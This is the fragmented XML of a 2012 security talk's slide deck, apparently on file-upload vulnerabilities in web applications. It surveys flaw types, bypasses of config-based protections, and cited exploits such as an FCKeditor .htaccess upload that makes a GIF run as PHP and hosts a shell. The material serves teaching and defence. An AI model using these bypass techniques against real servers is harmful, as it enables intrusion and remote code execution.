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20.gif" ContentType="image/gif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28.GIF" ContentType="image/gif"/>
  <Override PartName="/ppt/media/image29.gif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28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8" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="282" r:id="rId19"/>
    <p:sldId id="283" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="271" r:id="rId27"/>
    <p:sldId id="270" r:id="rId28"/>
    <p:sldId id="272" r:id="rId29"/>
    <p:sldId id="280" r:id="rId30"/>
    <p:sldId id="288" r:id="rId31"/>
    <p:sldId id="289" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="299" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="294" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="304" r:id="rId43"/>
    <p:sldId id="305" r:id="rId44"/>
    <p:sldId id="306" r:id="rId45"/>
    <p:sldId id="308" r:id="rId46"/>
    <p:sldId id="309" r:id="rId47"/>
    <p:sldId id="310" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="312" r:id="rId50"/>
    <p:sldId id="302" r:id="rId51"/>
    <p:sldId id="281" r:id="rId52"/>
    <p:sldId id="315" r:id="rId53"/>
    <p:sldId id="307" r:id="rId54"/>
    <p:sldId id="303" r:id="rId55"/>
    <p:sldId id="295" r:id="rId56"/>
    <p:sldId id="273" r:id="rId57"/>
    <p:sldId id="296" r:id="rId58"/>
    <p:sldId id="313" r:id="rId59"/>
    <p:sldId id="314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4754" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="-179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7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A7210-9BC4-4320-A9CC-313B1827FEE8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710BE-48C0-4E0C-A646-788A32480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87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haro.com/blog/software-development/web-development/2005/12/08/post-vs-put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stackoverflow.com/questions/2277423/put-request-turns-into-get" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://geekswithblogs.net/narent/archive/2008/01/04/118224.aspx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Reported File Upload Vulnerabilities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710BE-48C0-4E0C-A646-788A3248048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727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https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)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710BE-48C0-4E0C-A646-788A3248048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126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Can only see File Name and Extension.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limited Browsers can use “accept”(content-type)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710BE-48C0-4E0C-A646-788A3248048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75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 Side Protections: These protections can be simply bypassed. Client side validation only is being used to help users! It does not provide any security.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effectLst/>
              </a:rPr>
              <a:t>Web Server: .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, web.xml, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ApplicationHost.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Web.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
              <a:effectLst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Whitelist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Blacklist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Others: Encoding/Compression/Permission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710BE-48C0-4E0C-A646-788A3248048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196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http://tweakimg.net/files/upload/wafblackhat.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>http://www.coresecurity.com/files/attachments/Windows%20File%20Pseudonyms%20Dan%20Crowley%20Shmoocom%202010.pdf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710BE-48C0-4E0C-A646-788A3248048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575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webservers protect themselves by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files.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710BE-48C0-4E0C-A646-788A3248048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110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AddHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Should be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FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> \.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$&gt;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SetHandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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710BE-48C0-4E0C-A646-788A3248048E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272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710BE-48C0-4E0C-A646-788A3248048E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621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https://nealpoole.com/blog/2011/04/setting-up-php-fastcgi-and-nginx-dont-trust-the-tutorials-check-your-configuration/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710BE-48C0-4E0C-A646-788A3248048E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261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File system access and remote command/code execution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Damaging website reputation by defacing it or uploading inappropriate contents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Making a website vulnerable to the other types of attacks such as XSS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Creating an arbitrary file to exploit local file inclusion vulnerability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Exploiting vulnerable file monitoring tools such as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AntiVirus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Exploiting vulnerable libraries such as image or compression library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Creating phishing forms to steal users data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Dangerous files can be executed by other users/applications that have access to the server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Server can be used to store malwares, illegal software,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steganographic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objects, and so on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Can lead to Denial of Service by consuming the server’s space resource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Can lead to Denial of Service by creating invalid system files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web.config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.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htaccess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so on...)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710BE-48C0-4E0C-A646-788A3248048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069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different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> methods to upload a file into a server such as using PUT method, ActiveX, Java Applet, and so on. The most common method however, is using Multipart/Form-Data in a HTML form with POST method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0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 - POST Request...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discuss Multi-Part Post request because of the following reasons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http://www.elharo.com/blog/software-development/web-development/2005/12/08/post-vs-put/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http://geekswithblogs.net/narent/archive/2008/01/04/118224.aspx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Firewalls restriction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Sending multiple inputs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Browsers Limitation (</a:t>
            </a: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http://stackoverflow.com/questions/2277423/put-request-turns-into-get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710BE-48C0-4E0C-A646-788A3248048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622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http://www.ietf.org/rfc/rfc1867.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A boundary is selected that does not occur in any of the data. (This selection is sometimes done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>probabilisticly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name= HTML Field Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Filename= Original Filename + Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Second content-type: File’s content type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Encoding can be based on http://tools.ietf.org/rfc/rfc1522.txt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710BE-48C0-4E0C-A646-788A3248048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328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Uploaders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normal web applications; therefore, they can be vulnerable to any web application vulnerabilities such as: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Arbitrary (Unrestricted) File Upload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proper access control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Improper validation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Misconfiguration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Insecure Temporary File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Overwriting Critical files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CSRF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File/Path disclosure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XSS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SQL Injection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so on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710BE-48C0-4E0C-A646-788A3248048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610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 A: Plugin upload section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Jira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Group B: uploading avatars,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> photos, or in editors such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>FCKEditor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710BE-48C0-4E0C-A646-788A3248048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916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exploitable ones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710BE-48C0-4E0C-A646-788A3248048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173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http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html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710BE-48C0-4E0C-A646-788A3248048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378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http://en.wikipedia.org/wiki/Comparison_of_file_systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>http://msdn.microsoft.com/en-gb/library/windows/desktop/aa363911(v=vs.85).aspx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710BE-48C0-4E0C-A646-788A3248048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53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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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842"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588224" y="0"/>
            <a:ext cx="2555776" cy="142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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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B0B4-9E84-4C58-8738-80853B0E333F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A7D0-9C5F-4E73-9232-5500C62C477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50EB0B4-9E84-4C58-8738-80853B0E333F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0D1A7D0-9C5F-4E73-9232-5500C62C477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50EB0B4-9E84-4C58-8738-80853B0E333F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0D1A7D0-9C5F-4E73-9232-5500C62C477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gif"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media3.gif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xploit-db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goo.gl/Nmxp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v/Ws2JrZG679Q?version=3&amp;hl=en_US&amp;rel=0&amp;vq=hd720" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="FolderCreation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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://soroush.secproject.com/blo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v/HjS6Pob5t34?version=3&amp;hl=en_US&amp;rel=0&amp;vq=hd720" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="FileVista_DirTraversal.mp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GIF"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media4.GIF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ecuritytracker.com/id?1015063" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securitytracker.com/id/101302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ecunia.com/advisories/51156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gif"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media5.gif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svdb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goo.gl/NmxpM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gif"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media6.gif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ontplaydarts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v/1VpxlJ5jLO8?version=3&amp;hl=en_US&amp;rel=0&amp;vq=hd720" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="FCKEditor_2_6_8_FileUpload.mp4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ole1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79925" y="3526886"/>
            <a:ext cx="504056" cy="504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File in the h   le!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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Uploaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities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558924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HackPra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November 2012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092280" y="5589240"/>
            <a:ext cx="190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Soroush Dalili</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SecProject.com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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Uploaders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Vulnerabilities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fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Specific Issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Improper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or no access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arbitrary (Unrestricted) File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwriting critical files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Path disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Temporary File</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+ Other web application vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0" fontAlgn="base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Improper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or </a:t>
            </a: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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ccess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Group A:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin level access needed (Specific users which have been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerabilities…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client Side Attacks… CSRF , XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group B:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No authentication needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal user can have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>All the options are on the table!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/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91453">
            <a:off x="9503369" y="5104581"/>
            <a:ext cx="1101193" cy="15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2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36000" autoRev="1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08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349 0.04001 L 0.06944 0.0342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08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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Access Control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module/library, it is safe: Wrong!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is just an editor: Wrong!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bunch of images are harmless: Wrong!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In-house applications are more vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Published </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. in public apps:</a:t>
            </a:r>
          </a:p>
          <a:p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195699"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="4437112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OSVDB.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Records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36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earcake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19872" y="4221088"/>
            <a:ext cx="2797621" cy="2797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Arbitrary (Unrestricted) File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upload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Restricted File Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>or other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Can be bypassed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Unrestricted/Unprotected file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>upload:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>You can upload whatever </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>And NO access control? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Piece of cake!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177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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Arbitrary (Unrestricted) File Upload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59846"/>
            <a:ext cx="8229600" cy="1240953"/>
          </a:xfrm>
        </p:spPr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en-US" dirty="0"/>
              <a:t>Based on: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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://exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – total: 74 items </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>info: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goo.gl/NmxpM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/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050" name="Picture 2" descr="E:\Downloads\chart_2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15" y="1844824"/>
            <a:ext cx="6737371" cy="319504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8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Overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive Files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Changing the functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bypassing the protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make the website vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial of Service! Lame but possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pP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Famous sensitive files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, crossdomain.xml,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>clientaccesspolicy.xml, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>global.asa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>golbal.asax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0450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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting Sensitive Files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Exploit-DB ID: 17644</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FCKeditor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Old Version) Protection bypass by uploading a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even x_test.gif could run as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Better Exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running a shell inside the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
